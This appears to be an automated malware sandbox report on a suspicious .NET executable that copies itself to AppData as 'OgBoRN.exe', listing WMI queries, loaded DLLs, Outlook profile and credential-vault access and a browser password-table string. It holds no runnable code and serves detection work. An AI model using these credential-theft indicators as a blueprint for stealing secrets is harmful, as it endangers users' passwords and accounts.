              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: OgBoRN.exe, 00000003.00000002.2401382417.000000000814E000.00000004.00000800.00020000.00000000.sdmp, OgBoRN.exe, 00000003.00000002.2401382417.0000000008136000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: gq8sce-clean.com.com.exeReversingLabs: Detection: 44%
              Source: gq8sce-clean.com.com.exeVirustotal: Detection: 27%
              Source: gq8sce-clean.com.com.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
              Source: gq8sce-clean.com.com.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
              Source: gq8sce-clean.com.com.exeString found in binary or memory: $B2A5B5CE-3461-444A-91D4-ADD26D070638
              Source: gq8sce-clean.com.com.exeString found in binary or memory: $B2A5B5CE-3461-444A-91D4-ADD26D0706382
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeFile read: C:\Users\user\Desktop\gq8sce-clean.com.com.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\gq8sce-clean.com.com.exe "C:\Users\user\Desktop\gq8sce-clean.com.com.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe "C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe "C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe"
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: secur32.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: dlnashext.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: wpdshext.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: vaultcli.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: edputil.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Section loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rasapi32.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rasman.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rtutils.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: secur32.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: schannel.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dlnashext.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: wpdshext.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: vaultcli.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rasapi32.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rasman.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rtutils.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: secur32.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: schannel.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dlnashext.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: wpdshext.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: vaultcli.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\OgBoRN\OgBoRN.exe | Section loaded: windowscodecs.dll
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\gq8sce-clean.com.com.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
              Source: gq8sce-clean.com.com.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: gq8sce-clean.com.com.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: gq8sce-clean.com.com.exe | Static file information: File size 15542784 > 1048576
              Source: gq8sce-clean.com.com.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0xed0e00
              Source: gq8sce-clean.com.com.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: gq8sce-clean.com.com.exe, OgBoRN.exe.0.dr
